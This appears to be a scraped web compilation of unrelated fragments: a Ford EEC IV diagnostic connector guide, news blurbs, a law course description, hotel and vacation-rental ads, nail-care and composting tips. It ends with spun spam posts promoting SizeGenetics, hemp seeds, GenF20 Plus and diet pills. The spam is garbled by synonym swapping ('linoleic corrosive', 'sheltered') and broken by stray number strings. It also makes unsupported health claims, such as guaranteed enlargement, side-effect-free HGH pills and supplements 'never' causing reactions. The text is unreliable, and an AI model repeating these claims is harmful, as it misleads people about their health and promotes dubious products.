The 2.9L 12 Valve and also possibly the very early 2.5 TDi utilise the EEC IV PCM, this does allow for diagnostics via the Star Code system, sometimes referred to as On Board Diagnostics 1 (OBD1). Although this system is not as versatile as OBD2, it does allow the reporting of fault codes from the PCM, these fault codes refer to various sensors and variables concerned with the engine.
The EEC IV uses a very simple interface for diagnostics. Two Signals are used, Self Test Input (STI) and Self Test Output (STO). The Self Test Input is connected to Ground (0V) to initiate the tests. The Self Test Output is a 5V output, that can drive, for example an LED or voltmeter.
These connections are available on the Data Link Connector (DLC); this is located in the change cubby to the right (right hand drive) of the steering wheel. The following picture shows its location, the plastic cover must be unclipped to reveal the connector.
The DLC connector contains various signals, depending on the PCM, these are shown in the following table, however for the EEC IV reader we are interested in pins 3, 5, 11 & 16, these being, STO, Signal Ground, STI & +12V Battery Power.
The Scorpio’s DLC, is in fact the same physical connector as defined by the OBD2 standard, if manufacturing your own tester a blank male OBD2 connector is required. These are available if required.
A web search for EEC IV, will return many interesting links, a few are listed here: note - these are external links.
After the unprecedented events of 9/11, President Bush vowed to do everything in his power to prevent another attack on the United States. Although terrorism…
For many years Latin America has been associated with narcotrafficking and violence as tales of drug lords and atrocities dominate media coverage of the region,…
Our sense of identity shapes who we are and how we act; this is as true of collective identity as it is individual. But, what…
In an unexpected turn of events, EU foreign ministers reached a collective agreement that resulted in the immediate ease of sanctions against Zimbabwe in response…
President Obama is expected to make a decision on the northern extension of the Keystone XL pipeline in early June. As the date of the…
From severe flooding in Pakistan to post-tsunami destruction in Southeast Asia, the United States (US) government has used foreign aid as both a gesture of…
Since the end of the Cold War, the world has entered a new age where globalisation shapes our political system, our economy and even how…
Last week’s Almaty-based round of negotiations between the P5 +1 and Iran over the continuation of the Islamic Republic’s nuclear enrichment programme came to naught.…
For a man who permanently wears a beard to hide the scars on his face (not a shark attack, a traffic accident) then Mariano Rajoy,…
This month, Xi Jinping, current head of the Communist Party in the People’s Republic of China, will become President Hu Jintao’s successor. An active member…
Hugo Chávez is dead. It is hard for me to rationalise actively celebrating the death of anyone. Death is unpleasant and 99.9% of the time,…
Amid the self-congratulation and self-aggrandisement that has followed the conclusion of the Don’t Walk fashion show in St Andrews, a bizarre bundle of contradictions at the heart of the enterprise has gone almost unnoticed. Don’t Walk styles itself as a response to 9/11. The disconnect between the complexity, tragedy, significance and seriousness of 9/11 and the elitism, misdirection, and the mismatched and misunderstood aims and means of Don’t Walk could not be more stark.
St Andrews Foreign Affairs Review | Designed by: Theme Freesia | WordPress | © Copyright All right reserved
[ Regulatory & Policy ] as a Related Elective for those interested in Empirical Research : Students interested in policy or academic work will benefit from developing a publishable research project. If you are interested in a topic that involves empirical research, this course will expose you to advanced statistical techniques and should help you develop a detailed project design for eventual publication.
This course will examine topics in the empirical evaluation of law and policy for those who have already been exposed to basic statistics and regression. The course will begin with a discussion of problems of causal inference that have plagued some traditional statistical approaches and then examine the virtues and limitations associated with some more advanced techniques, such as regression discontinuity analyses and instrumental variables estimation. The course is designed to move students towards a publishable empirical research project. Given the constraints of the quarter system, the product is more likely to end with a detailed project design rather than a fully implemented study. Successful completion of the course requires regular attendance, and: (1) careful reading of the course assignments coupled with frequent one page written assignments on the reading; and (2) a PowerPoint presentation to the class discussing a major paper. (3) A detailed project design using one of the empirical approaches discussed in the class.
Course Style: A Substantive/ Perspective course looks at law from an external or non-traditional standpoint.
© 2013 Stanford University, all rights reserved. This tool is intended for personal use only. Without the express written permission of Stanford Law School, the content in this tool may not be copied for any purpose, including non-commercial purposes. Permission requests to copy the content of this tool should be directed to slsnavigator@law.stanford.edu.
Just a couple of days before the New Year in the lobby of the Repino Cronwell Park Hotel a great place was constructed for people who like to make "selfie". We are glad to announce our amazing tintamarresque (photo stand-in), which fully complies with the creative atmosphere of the town of Repino!
Now, every guest can take picture of itself among the masterpieces of one of the greatest Russian artist I. Repin, and perhaps reincarnate into the image of one of the heroes of other pictures that are not represented in the collage: Ivan the Terrible, Volga Boatmen - everything depends on your imagination.
Miraggio Music Festival, starring the soloists of world-famous Helikon-opera from Moscow, was held from 4 till 10 September with great success.
On the 8th of July, at Cronwell's Miraggio Thermal Spa Resort, the unique Amusement Park for Children, whose main characters are animatronics,...
We use cookies to improve the way you interact with our website. By continuing to view this page, you are agreeing to use cookies. Learn more about our "Cookies Policy".
We use marketing cookies if you have given permission for this. If you do not give permission, advertisements will still be shown, but these are random advertisements. You can make your choice below.
We are Muffin Group and we do awesome themes. We do what we love and this is the best in our life. Try a piece of our work and you will not want to swap for anything else!
Please find below the Natural radiation answer and solution which is part of Daily Themed Crossword July 13 2018 Answers. Many other players have had difficulties with Natural radiation that is why we have decided to share not only this crossword clue but all the Daily Themed Crossword Answers every single day. In case something is wrong or missing kindly let us know by leaving a comment below and we will be more than happy to help you out.
Did you find the answer for Natural radiation? To go back to the main post you can click in this link and it will redirect you to Daily Themed Crossword July 13 2018 Answers.
Wanna win big? Embrace a little risk. That's the message relayed by "Tommyg1979" about 48 hours after his most recent notable victory. More
Artificial nails are the best and the quickest solution to get long nails. They definitely add oomph to your style statement. You can choose from endless shapes, designs and vibrant colours. Some women prefer them on special occasions whereas others get them done regularly.
Artificial nails are very popular because they last a long time, they are hard to break and almost every colour looks good on long nails. On the other hand, they can harm the natural nails. They can cause infections and can be very uncomfortable at first. Maintenance is key to keeping your artificial nails intact.
Application of artificial nails involves the use of strong chemicals, which can cause allergy to some women
Since artificial nails increase the length of your nails, dirt can enter into them very easily. You should clean them regularly. You can use a soft bristle brush to clean the dirt. Make a routine to clean your nails daily.
Once you are satisfied with your nail technician, you should stick to him or her only. This will help them know your nails and their concerns better. You should also make sure that all the tools used are sterilized before the process to avoid infection.
After washing your hands, dry your nails properly. Leaving your hands wet can act as a breeding ground for bacteria to spread infection.
Dry nails can break easily, use different types of oils to keep them healthy. Olive oil offers various benefits to nails. You can apply olive oil to your nails before sleeping.
Moisturise in between the fingers to prevent dryness. Apply lotion twice or thrice a day for healthy hands and nails.
Artificial nails require regular filling sessions. Make sure you visit your nail technician regularly.
Using antibacterial soap can cut down the possibility of a bacterial infection. Wash your hands after regular intervals to avoid growth of infections.
Acetone can completely ruin and weaken artificial nails causing them to separate from the real nails.
Composting is a great way to reduce waste and create a precious, natural fertilizer for your garden. But, do you know the simple steps you need to follow in order to start a successful pile?
Brown matter, green matter, and water. Brown materials are items such as yard waste that add no moisture to the pile. Green materials, such as lawn clippings and food scraps, add a significant amount of moisture. The brown materials provide carbon for your compost, the green materials provide nitrogen, and the water provides moisture to help break down the organic matter. The general rule of thumb for a successful compost bin that breaks down quickly and effectively is two parts brown materials to every one part green material. Your pile will break down regardless of the ratio but this makes for ideal conditions.
This nutrient dense material can also suppress plant disease. Using your compost pile in place of a conventional fertilizer will not only save you money but encourage growth of organic plants. Often, organic seeds do not work well with traditional, chemical fertilizers. A compost pile can replenish soil that has been depleted of the nutrients needed for growing a successful garden.
An area of bare ground, a fenced in area, aerated garbage can, or a commercial compost bin. You will also need a pitch fork or tool for turning the bin if you are not using a commercial bin that is turn-able. Also, proper air and additional water may be needed to maintain conditions in your pile.
It is also helpful to have a compost collector in your kitchen. A small bin like these by OXO or Exaco Trading will contain your food scraps indoors until you are ready to take it to your pile.
Using a pitchfork, or similar item, frequently turn your compost pile. Turning will speed up the process and maintain the compost. After adding a large amount of brown material, be sure to slightly water the compost pile. Remember, the water is what breaks down the organic materials.
Since the compost process works best at temperature between 120 and 150 degrees composting in the warmer months is easier to do, if this is your first attempt at composting best to try in the summer. Once you get a successful pile started, you can continue throughout the year.
Proper particle size is important for an speedy breakdown. The smaller the individual pieces of material are increases the surface area on which the microorganism can feed. The smaller particles also make evenly turning your pile easier.
Decomposition can only efficiently take place when there is an adequate supply of oxygen. Because of this be sure to properly vent your compost bin or pile.
Composting is the ultimate lesson in reduce, reuse, recycle. Teach your children the principles of all three with this hands-on activity. Let them take their own dinner leftovers to the bin and encourage them to help out with lawn and garden chores. Adding to the bin and using the finished compost on your vegetable garden.
Amanda lives in Ohio with her fiancé and one year old son. She enjoys spending her days listening to amazing music while teaching her son awesomely bad dance moves. Her hobbies change monthly, but she stays constantly focused on clean eating, being green and spending as much time outdoors as possible.
Graduating senior Lesley Garaycochea was named the U’s finalist in the Harry S. Truman Scholarship program.
Garaycochea, a nontraditional student in the family and consumer studies program, was selected as one of 197 finalists from 775 applicants. Participation was represented by 130 colleges and universities from across the nation.
“We are so proud of Lesley [Garaycochea],” Shipley said. “The Truman Scholarship is a nationally competitive graduate school scholarship for juniors or seniors who want to make a difference. They really are for students who include public service among their top life goals.”
Garaycochea has been involved in service throughout her undergraduate career, advocating for victims of domestic and sexual violence through the courts, the Salt Lake County Mayor’s Office and the Utah State Legislature. She has served in several campus and community leadership positions while maintaining the academic standard required to apply.
As a finalist, Garaycochea is one of dozens of U alumni who were in the same position and 25 former winners. The U has produced seven Truman Scholars in the last eight years — more than any other school in the country.
“We provide a lot of mentoring and opportunities to find their path,” Shipley said. “Part of the application is leadership, and we can really facilitate that with all of the opportunities and connections we have locally, globally and internationally.”
In addition to internships, the Hinckley Institute offers courses, seminars, forums, outreach opportunities and a minor in campaign management.
If selected as a recipient, Garaycochea plans to use the $30,000 scholarship to finance a joint JD and Masters of Public Policy degree focusing on criminal law and domestic policy. However, there are other advantages to the award as well.
“The scholarship award is substantive, but it goes beyond financial gains,” Shipley said. “You’re part of this elite group for all future endeavors. It opens a lot of doors.”
This is a placeholder page for Karen Thomas, which means this person is not currently on this site. We do suggest using the tools below to find Karen Thomas.
You are visiting the placeholder page for Karen Thomas. This page is here because someone used our placeholder utility to look for Karen Thomas. We created this page automatically in hopes Karen Thomas would find it. If you are not Karen Thomas, but are an alumni of Daingerfield High School, register on this site for free now.
Rescue Me! Tip: Running in a large backyard is not enough for most animals. Dogs require a minimum of a 30 minute leash walk every day.
To reach Eureka, Nt in this distance one would set out from Abashiri bearing 9.7° or N and follow the great circles arc to approach Eureka, Nt bearing 136.1° or SE .
Eureka, Nt has a tundra climate (ET) whereas Abashiri has a warm summer continental/ hemiboreal climate with no dry season (Dfb).
Average monthly temperatures vary by 17.5 °C (31.5°F) more in Eureka, Nt. The continentality subtype is truly continental as opposed to subcontinental.
Total annual precipitation averages 747.3 mm (29.4 in) less which is equivalent to 747.3 l/m² (18.34 US gal/ft²) or 7,473,000 l/ha (798,913 US gal/ac) less. About 0 as much.
The table shows values for Eureka, Nt relative to Abashiri. You can also view this comparison the other way around from the perspective of Abashiri vs Eureka, Nt.
To reach Eureka, Nt in this distance one would set out from Arak bearing 352.2° or N and follow the great circles arc to approach Eureka, Nt bearing 220.3° or SW .
Eureka, Nt is in or near the polar desert biome whereas Arak is in or near the warm temperate thorn steppe biome.
Total annual precipitation averages 277.6 mm (10.9 in) less which is equivalent to 277.6 l/m² (6.81 US gal/ft²) or 2,776,000 l/ha (296,773 US gal/ac) less. About 1/5 as much.
The table shows values for Eureka, Nt relative to Arak. You can also view this comparison the other way around from the perspective of Arak vs Eureka, Nt.
The forthcoming issues feature Spike Jonze’s Where The Wild Things Are in some way: the director is interviewed in Huck (hence he appears on the cover alonside some rather intrusive “wild things”), while Little White Lies is wholly dedicated to the new film, based on Maurice Sendak’s children’s book (main character, Max, features on their cover).
Book your perfect Vacation Rental in Miami Beach, Florida on FlipKey today! FlipKey has thousands of reviews and photos to help you plan your memorable trip. Explore over 974 House Rentals, view Photos, find Deals, and compare 1,668 Guest Reviews.
Vacation Resorts International (VRI) brings you an entire world of vacation adventures. from sunny southern California to the dunes of Cape Cod. the serene beauty of a sunrise at one of our majestic mountain vacation destinations or a family visit to Florida. a special second honeymoon in beautiful Lake Tahoe.
Explore an array of North America vacation rentals, including houses, condos & more bookable online. Choose from more than 10,000 properties, ideal house rentals for families, groups and couples.
Statutory Surgery 2018 Omnibus Association Bill. April 14, 2018 – A few years ago, rampant abuses by rogue Condo Boards in Miami-Dade sparked a series of events that prompted revisions to the laws governing Florida associations.
Maybe worse: a condominium board ballot in South Florida. That condo combat provides the setting for Paul Goldberg. a degree of fame as a plastic surgeon known as the Butt God of Miami Beach — Bill calls him "a posterior designer."
Travel & find accommodations in Florida. Mountain, seaside, beach getaways, and bed and breakfasts are available on Kijiji vacation rentals.
But the flooding is already happening in Florida. At the University of Miami’s Department of Atmospheric Sciences, Brian McNoldy and other researchers have been accumulating sea-level data from Virginia Key (a small island just south of.
Jun 10, 2018 – View the Best 1,836 vacation rentals with Prices in Florida Keys with TripAdvisor’s 5,629 unbiased reviews for a great deal on house rentals in Florida.
(WSVN) — A child battling cancer had his wish granted during a visit to the Florida. of sea lions thanks to the Make-A-Wish Foundation. The 5-year-old, who is battling blood cancer, chose the destination after previously visiting it on.
Explore an array of Miami, FL vacation rentals, including condos, apartments & more bookable online. Choose from more than 5,000 properties, ideal house rentals for families, groups and couples.
DoubleTree by Hilton Grand Hotel Biscayne Bay offers many business services and leisure activities for your stay in Miami.
Zombie Cheerleading Camp Reorganization Meeting for 2018-19 school year 2:20pm 3:00pm: KEA : Chorus Room Footage has emerged of a bus driver who was involved in a terrifying crash texting while driving. The man is driving. Your Guide to 2018 Summer Camp and Activities in Tampa Bay! **Click on each Summer Camp title for more information** Join us
Jun 11, 2018 – View the Best vacation rentals with Prices in Miami Beach. View TripAdvisor’s 1,950 unbiased reviews and great deals on house rentals in Miami.
What Is Your Timeshare Worth? FILL OUT THE FORM TO SEE ITS VALUE If you would like to see how much your timeshare is worth, fill out the instant value report form.
The family was heading home from their Orlando vacation when Earley said her daughter realized her “baby bear” was gone. “As we’re traveling north down I-77, my daughter’s yelling because we can’t find her baby bear,” Earley told.
Hawaii Resort PacA vacation to the Hawaiian Islands is truly like no other. Book an all-inclusive Hawaii vacation package today!
Sea Isle Condos- Marathon, Florida Keys. Located at mile marker 53.8 on prestigious Key Colony Beach – just 55 miles north of Key West and 110 miles south of Miami.
Book your perfect Vacation Rental in Florida Keys, Florida on FlipKey today! FlipKey has thousands of reviews and photos to help you plan your memorable trip. Explore over 1,505 Vacation Rentals, view Photos, find Deals, and compare Guest Reviews.
Planning your next vacation? We offer local knowledge and hundreds of superb vacation home rentals in beautiful Florida and North Carolina. Book Today!
The penis broadening market is a major one. There are many items accessible for procurement, and just some of them work and are sheltered. With regards to male upgrade just two things matter – security and proficiency. Along these lines, all together for a man to choose whether or not to buy SizeGenetics, he should initially investigate the SizeGenetics results. What are the publicized outcomes, and would they say they are ensured? NO.500	NO.558
What are the promoted SizeGenetics results? As indicated by the maker an expansion of up to 30% can be seen inside the course of five to a half year. Does this sound sensible and acceptable? On the off chance that a guarantee does not sound credible, the offer is in all probability not genuine either. An expansion of around 30% sounds reasonable, and this is the thing that different penis development arrangements publicize too.
The following inquiry that should be addressed is how are these outcomes achieved? The SizeGenetics gadget functions as a penis work out. It extends the male organ, and this triggers cell devision, which thusly builds the extent of the penis. The motivation behind why this strategy is sheltered is on the grounds that it has been around for more than 2000 years. Antiquated clans, be that as it may, utilized it for different purposes -, for example, extending their necks. Today leg and a safe distance inconsistency is treated similarly. NO.514	NO.572
There is no reason for utilizing an item if security and results can’t be ensured. So can Sizegenetics results and wellbeing be ensured? The half year unconditional promise can guarantee a man that this gadget is not kidding about outcomes. Also, the multi year experience of the strategy embraced by this gadget, ensures that a man’s wellbeing will stay unblemished. With such a significant number of item accessible available today, it is essential that the “results and wellbeing” rule is constantly pursued.
Out of the considerable number of organs and bones in a male body, penis is by a long shot the most discussed. The two people appreciate enormous penises and in case you’re sufficiently fortunate to be well hung at that point you’re one stage in front of generally men. The penis has 3 basic capacities which are to urinate, imitate and finally for sexual delight. NO.526	NO.584
The main basic capacity anybody discusses however is sexual execution. You should have the capacity to perform explicitly to keep your lady cheerful. Penis is the most utilized device out of the genitalia region and has been similar to that for all of life. The two people can be stimulated by vast penises and regularly both utilize it for joy. You require charisma or for better term steady inflow and outtake of blood to the penis region. Without this your sexual coexistence will disintegrate.
At the point when issues of penises are discussed it appears to be a great many people just discuss the size and how “huge” it is. Men have been humiliated and cognizant about their little penises yet now that more men are opening up, I’ve seen an expansion in the measure of men approaching searching for penis augmenting items. There are numerous items online that offer you a greater penis and with so much publicizing being accomplished more men are attempting the items out for themselves. The million-dollar industry is set to move into the billion businesses inside the following couple years. NO.540	NO.598
With every one of the items available it’s difficult to know which ones all work and which don’t and it’s difficult to test them full scale. A few organizations comprehend what men are searching for however and their items do demonstrate that penises can be augmented. Regularly I would just utilize well known items with loads of audits.
The program I need to enlighten you concerning is called SizeGenetics. SizeGenetics is a totally progressive program that will transform any penis into a bigger penis and the item has excellent outcomes. The item utilizes footing framework and free penis practices made particularly for SizeGenetics program. This item will make your penis longer and thicker and both you and your sexual accomplice will have better sexual coexistence while utilizing this item.NO.550	NO.608
Author descarwarePosted on November 2, 2018 November 2, 2018 Leave a comment on SizeGenetics Results – What Can a Man Expect After the Full Treatment?
Notwithstanding, hemp seeds contain just follow measures of THC, the intensify that causes the medication like impacts of cannabis.
Hemp seeds are uncommonly nutritious and rich in sound fats, protein and different minerals. 25408	25225	25591	25818
Actually a nut, hemp seeds are exceptionally nutritious. They have a mellow, nutty flavor and are regularly alluded to as hemp hearts.
Hemp seeds contain more than 30% fat. They are astoundingly rich in two fundamental unsaturated fats, linoleic corrosive (omega-6) and alpha-linolenic corrosive (omega-3).
They likewise contain gamma-linolenic corrosive, which has been connected with a few medical advantages (1).
Hemp seeds are an awesome protein source, as over 25% of their aggregate calories are from top notch protein.
That is significantly more than comparable nourishments like chia seeds and flaxseeds, which give around 16–18%. 25416	25233	25599	25826
Hemp seeds can be devoured crude, cooked or broiled. Hemp seed oil is likewise exceptionally solid, and has been utilized as a sustenance/pharmaceutical in China for no less than 3,000 years (1).
Main concern: Hemp seeds are rich in sound fats and basic unsaturated fats. They are likewise an awesome protein source and contain high measures of vitamin E, phosphorus, potassium, sodium, magnesium, sulfur, calcium, iron and zinc. 25426	25243	25609	25836
They contain high measures of the amino corrosive arginine, which is utilized to deliver nitric oxide in the body (4). 25440	25257	25623	25850
Nitric oxide is a gas particle that makes the veins expand and unwind, prompting brought down circulatory strain and a lessened danger of coronary illness (5).
In one expansive investigation of more than 13,000 individuals, expanded arginine admission was connected with diminished levels of C-responsive protein (CRP). CRP is a fiery marker connected with coronary illness (6, 7).
The gamma-linolenic corrosive found in hemp seeds has additionally been connected with lessened aggravation, which may diminish the danger of infections like coronary illness (8, 9).
Moreover, creature ponders have demonstrated that hemp seeds or hemp seed oil may lessen pulse, diminish the danger of blood cluster arrangement and enable the heart to recuperate after a heart assault (10, 11, 12).
Main concern: Hemp seeds are an extraordinary wellspring of arginine and gamma-linolenic corrosive, which have been connected with a diminished danger of coronary illness. 25455	25272	25638	25865
Hemp seeds are a decent wellspring of polyunsaturated and basic unsaturated fats. They have around a 3:1 proportion of omega-6 to omega-3, which is considered in the ideal range.
Studies have demonstrated that giving hemp seed oil to individuals with skin inflammation may enhance blood levels of fundamental unsaturated fats.
Main concern: Hemp seeds are rich in sound fats. They have a 3:1 proportion of omega-6 to omega-3, which may profit skin infections. Now and again, this may give alleviation from skin inflammation and its awkward side effects.
Indeed, by weight, hemp seeds give measures of protein like hamburger and sheep. 30 grams of hemp seeds, or 2–3 tablespoons, give around 11 grams of protein (1).
They are viewed as a total protein source, which implies that they give all the fundamental amino acids. Basic amino acids are not delivered in the body and should be gotten from the eating routine. 25479	25296	25662	25889
Finish protein sources are extremely uncommon in the plant kingdom, as plants regularly do not have the amino corrosive lysine. Quinoa is another case of a total, plant-based protein source.
Hemp seeds contain huge measures of the amino acids methionine and cysteine, and also elevated amounts of arginine and glutamic corrosive (18).
The edibility of hemp protein is additionally great — superior to anything protein from many grains, nuts and vegetables (19).
Main concern: About 25% of the calories in hemp seeds originated from protein. Hemp seeds contain all the basic amino acids, making them a total protein source.
Up to 80% of ladies of regenerative age may experience the ill effects of physical or passionate indications caused by premenstrual disorder (PMS) (20).
In an investigation of ladies with PMS, taking one gram of basic unsaturated fats (counting 210 mg of GLA) every day brought about a huge reduction in indications (22).
Different examinations have demonstrated that primrose oil, which is rich in GLA, might be exceptionally compelling in diminishing indications for ladies who have fizzled different PMS treatments.
It diminished bosom agony and delicacy, sorrow, crabbiness and liquid maintenance related with PMS (25).
Since hemp seeds are high in GLA, a few investigations have shown that hemp seeds may likewise help lessen the indications of menopause.
Precisely how this functions is obscure, yet it has been recommended that the GLA in hemp seeds may control the hormone lopsided characteristics and aggravation related with menopause (26, 27, 28). 25487	25304	25670	25897
Primary concern: Hemp seeds may diminish side effects related with premenstrual disorder (PMS), and may likewise emphatically influence side effects of menopause.
Fiber is a fundamental piece of the eating routine and is connected with better stomach related wellbeing (29).
Dissolvable fiber shapes a gel-like substance in the gut. It is an important wellspring of supplements for the useful stomach related microscopic organisms, and may likewise decrease spikes in glucose and manage cholesterol levels (29, 30).
Insoluble fiber adds mass to fecal issue and may help nourishment and waste go through the gut. Devouring insoluble fiber has additionally been connected with a decreased danger of diabetes (31, 32).
In any case, de-hulled or shelled hemp seeds (otherwise called hemp hearts) contain almost no fiber, in light of the fact that the fiber-rich shell has been evacuated.
Primary concern: Whole hemp seeds contain high measures of fiber, both solvent and insoluble, which benefits stomach related wellbeing. De-hulled hemp seeds have had the fiber-rich shell expelled, and along these lines contain next to no fiber.
In spite of the fact that hemp seeds have not been prominent as of not long ago, they are an old staple sustenance and individuals are presently understanding their fantastic healthful esteem.
Nonetheless, hemp seed shells may contain follow measures of THC (< 0.3%), the dynamic compound in cannabis. Individuals who have been dependent on cannabis might need to abstain from devouring hemp or hemp seeds in any shape. Generally speaking, hemp seeds are staggeringly sound. They may very well be one of only a handful few superfoods that are really deserving of their notoriety.
Author descarwarePosted on July 17, 2017 Leave a comment on 6 Evidence-Based Health Benefits of Hemp Seeds
GenF20 Plus is utilized to avoid against hostile to maturing by invigorating the pituitary organs to deliver a development hormone that keeps you looking more youthful. Each individual at one time in their lives will reach in the event that they have not achieved the moment that they begin getting to be unreliable about their look comparing with their age. There are numerous methods for managing maturing or lessening the impacts of maturing, for example, taking nourishment supplements which supply the body with HGH from outside sources and keeping up a solid way of life.
HGH is a human development hormone that is consistently delivered in your body as you develop and keeps up your vitality and cell exercises with the goal that you generally remain youthful and stimulated. There are numerous sorts of medications out in the market that case they can help with maturing. Anyway the vast majority of them have reactions that might be difficult to manage them. It is fitting to be very much educated about the advantages and disadvantages of these items previously placing them into your framework.
Outside wellsprings of HGH will stifle the body’s normal generation of HGH by the pituitary organs. GenF20 Plus just energizes the regular procedure of creating the hormone. This is a pill that is managed two times per day by putting it under the tongue. The individuals who have utilized the pill recognition that they saw the outcomes in as meager as seven days from the time they began taking the medication. NO.32	NO.132	NO.81	NO.181
Your childhood vitality returns and you feel the quality in your bones and furthermore you will see the wrinkles diminishing. Individuals who are getting maturing not by any means the only individuals who utilize GenF20 Plus, yet additionally untimely maturing because of the worry of every day living. The rate of digestion increments with incitement from outside sources yet rather expanded generation of HGH.
Expanded digestion will prompt weight reduction which will give you a more youthful look. Maturing skin looks wrinkled, uneven skin tone, dark circles underneath the eyes and eye sacks. GenF20 Plus assists with this by holding dampness under the skin enhancing its appearance. You will have the capacity to get back your vitality that was blurring without end and physical perseverance. The pill has a covering that makes it simple for it to get consumed when it is put under the tongue.
In the event that you are as yet hunting down the best enemy of maturing treatment that can switch or if nothing else back off the way toward maturing, you are in fortunes since this short article will give you some data and certainties about Genf20 Plus. You have most likely known about human development hormone treatment to postpone the maturing procedure yet you thought it was excessively terrifying, making it impossible to attempt since it expects you to experience infusions that could have symptoms. This isn’t the situation with Genf20. This enemy of maturing treatment is so basic and simple anybody can do it at home.
On the off chance that you need to purchase Genf20 Plus, you can undoubtedly do as such without a specialist’s medicine. It is sheltered and has no symptoms yet you can get great outcomes following three weeks of taking the cases two times per day. NO.48	NO.148	NO.97	NO.197
The fortunate thing about Genf20 Plus is that you don’t have to go to a specialist’s center and have HGH infusions. Infusions can be difficult and they can likewise effectsly affect your body. HGH shots are additionally extremely costly. They can influence $10000 to $30000 dollars consistently. There is additionally a more prominent plausibility of overdose.
In the event that what you are searching for is a most optimized plan of attack back to your energetic years, at that point this enhancement isn’t for you. GenF20 Plus is anything but an enchantment pill. It would not make you feel more youthful and more grounded medium-term. No type of medicine works that way. GenF20 Plus is a characteristic item which when joined with exercise and a solid eating routine, your wellbeing and prosperity will significantly make strides. Being that everyone is extraordinary; the outcomes for any two individuals probably won’t be the equivalent. It may work for you and not work for someone else. This is nothing to stress over since GenF20 Plus accompanies a certification. Simply be mindful so as not to buy counterfeit HGH (Human Growth Hormone) releasers in light of the fact that the market is overwhelmed with them and you won’t get indistinguishable fulfillment from these enhancements from with GenF20 Plus. NO.57	NO.157	NO.106	NO.206
Maturity is a standout amongst the most feared periods in a single’s life. It influences our wellbeing and the manner in which we see ourselves. Because of the way that maturing is something each one is endeavoring to abstain from, thinking about our bodies has turned into a need. The more established we get, the weaker we feel. Those exercises we used to appreciate doing in our young years will move toward becoming relics of days gone by. Indeed, even normal exercises that were once simple and brisk will get harder for us to achieve. Interestingly, maturity does influence our wellbeing as well as our physical appearance. The minute you get up each morning, you are welcomed by wrinkles and stretch imprints and they get all the more consistently.
The issue of weight gain likewise sets in whether you control it or not. Just this time around, the skin hangs and it won’t be as firm as it used to be. I don’t figure any one would need that. The typical 24 hour day gets too ache for us thus we rest in the middle of so it can seem shorter. We wind up delicate to temperature and get finicky with the sort of nourishment we eat and what we drink. To top it all off, the greater part of us will tend to look more established than we truly are. This is the genuine motivation behind why dealing with our body and keeping up a decent wellbeing ought to be our need. NO.65	NO.165	NO.114	NO.214
Bunches of research has been done by specialists and researchers to discover diverse manners by which we can look and feel more youthful. An ongoing examination which was done on twenty-one men matured 61 had extraordinary outcomes. In the wake of experiencing tests and careful therapeutic checkups, the gathering was isolated and HGH infusions were directed to one gathering. Following a half year, individuals from this gathering demonstrated generally enhancements. Their condition of wellbeing and physical appearance made strides. Their skin was firmer and thicker; they lessened in fat and had expanded in their HGH levels.
Having a low HGH level is the thing that makes you age. This equitable implies that expanding your HGH level will draw you nearer to feeling that you are an adolescent once more. You will get more fit, increment in quality and have harder skin.
Author descarwarePosted on November 2, 2018 Leave a comment on GenF20 Plus – What You Need to Know First
I will shout it from the peaks of the world! To shed pounds normally is the most ideal approach! As I would see it, huge numbers of the purported weight reduction organizations are authorized street pharmacists! The pills, elixirs and pre-bundle supper designs that they push on overweight purchasers are ordinarily bound with hazardous and possibly physically weakening substances!
Pills, elixirs and pre-bundle dinners are ordinarily brimming with fixings that none of those organizations would provide for their own relatives. However, they will without cognizant offer it to you in the mask of a pill or a yummy fluid eating routine drink and say, “it’s alright, drink-up sucka!” Most of that refuse that they market to you has a time span of usability more established than soil itself! Have you asked what is in an item that can make it keep going so long without going stale? CDA500	CDA600	CDA700	CDA800	CDA900	CDA1000	CDA1100
Regardless of whether it is pills, mixtures (fluids eats less carbs) and pre-bundled weight reduction dinners, they generally put untested hurtful synthetic concoctions that unnaturally fortify your digestion. These synthetics have chance related them, that at last can destabilize the typical physiologic elements of your body. Individuals, I am here to reveal to you that these some of compound added substances are lethal and unsafe.
Huge numbers of them are uncertified fixings that have gotten away from the FDA domain… until further notice. With a little tolerance and remaining steady all common weight reduction techniques can work for you similarly also. Indeed, using techniques that reason you to shed pounds normally and securely can prompt a more sound weight reduction.
All common weight reduction isn’t mysterious, yet now and again, it appears however it is by the exceptional aftereffects of pounds being lost that many get when they shed pounds normally. CDA512	CDA612	CDA712	CDA812	CDA912	CDA1012	CDA1112
Take a gander at it thusly, on the off chance that you have little youngsters, I promise you that you would not sustain your children those toxic and generally harmful destructive substances in that stuff that the weight reduction organizations are pushing on you.
On the off chance that you like your liver, kidneys, heart and cerebrum then it would be a really smart thought to back off of those fast, fleeting sensation possibly “abruptly dead” sort of items! Or on the other hand in the event that you can get by with no of those vitals organs at that point don’t hesitate to overlook this message.
With all common weight reduction, it isn’t fabulous and the motion picture stars are not clamoring on top of it, but rather it works hugy and you don’t need to forfeit a liver of kidney simultaneously! On the off chance that you are endeavoring to get in shape, at that point it is firmly prescribes running with a sheltered, solid all normal weight reduction approach. CDA525	CDA625	CDA725	CDA825	CDA925	CDA1025	CDA1125
Outstanding amongst other approaches to accelerate weight reduction is to take supplements while you are abstaining from excessive food intake. While they won’t replace practice and changing your dietary patterns, there are many eating routine pills that can enable you to shed pounds speedier. On the off chance that you are somebody who is worried about taking eating routine pills on account of the majority of the synthetic concoctions required, there are an assortment of all characteristic weight reduction supplements, for example, Raspberry Ketone, African mango and Hoodia Gordonii.
The benefits of taking these sorts of eating regimen pills are that they are removed from foods grown from the ground, so they are normally veggie lover and vegetarian benevolent. Moreover, when you are attempting to shed pounds, you will probably enhance your general wellbeing and can rest easy. Taking plant based eating regimen supplements can enable you to get in shape speedier and normally.
An incredible aspect regarding all regular weight reduction supplements is that there are so scarcely any symptoms. For instance, Raspberry Ketone, which has been appeared to decrease weight increase because of high fat eating regimens, has never had any reported reactions. It is taken straightforwardly from raspberries, so it is a totally sound supplement. Furthermore, individuals who take raspberry ketone as an eating regimen pill are profiting from the majority of the cancer prevention agents that the natural product brings to the table. CDA539	CDA639	CDA739	CDA839	CDA939	CDA1039	CDA1139
Another case of an eating routine pill that is produced using organic product is the African mango. The nuts in this mango have been appeared in various examinations to not just enable individuals to get thinner by consuming muscle to fat ratio quicker, yet it additionally has been appeared to bring down cholesterol. It is one of a couple of all common weight reduction supplements that have been appeared to be both successful and bravo.
